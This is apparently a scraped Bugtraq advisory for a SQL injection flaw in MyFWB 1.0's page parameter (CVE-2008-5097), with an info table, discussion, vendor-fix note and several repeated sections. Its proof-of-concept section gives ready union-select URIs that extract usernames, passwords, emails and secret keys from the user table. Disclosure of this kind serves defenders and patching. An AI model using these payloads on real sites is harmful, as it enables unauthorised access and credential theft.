MyFWB Page Variable SQL Injection Vulnerability
BID:31269
Info
MyFWB Page Variable SQL Injection Vulnerability
| Bugtraq ID: | 31269 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-5097 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 20 2008 12:00AM |
| Updated: | May 07 2015 05:23PM |
| Credit: | 0x90 |
| Vulnerable: |
MyFWB MyFWB 1.0 |
| Not Vulnerable: |
MyFWB MyFWB 1.1 |
Discussion
MyFWB Page Variable SQL Injection Vulnerability
MyFWB is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
MyFWB is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Exploit / POC
MyFWB Page Variable SQL Injection Vulnerability
Attackers can exploit this issue via a browser.
The following example URIs are available:
Username:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user
Password:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user
Email:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user
Secret Key:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user
Attackers can exploit this issue via a browser.
The following example URIs are available:
Username:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user
Password:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user
Email:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user
Secret Key:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user
Solution / Fix
MyFWB Page Variable SQL Injection Vulnerability
Solution:
A vendor update is available. Contact the vendor for details on obtaining the appropriate updates.
Solution:
A vendor update is available. Contact the vendor for details on obtaining the appropriate updates.
References
MyFWB Page Variable SQL Injection Vulnerability
References:
References: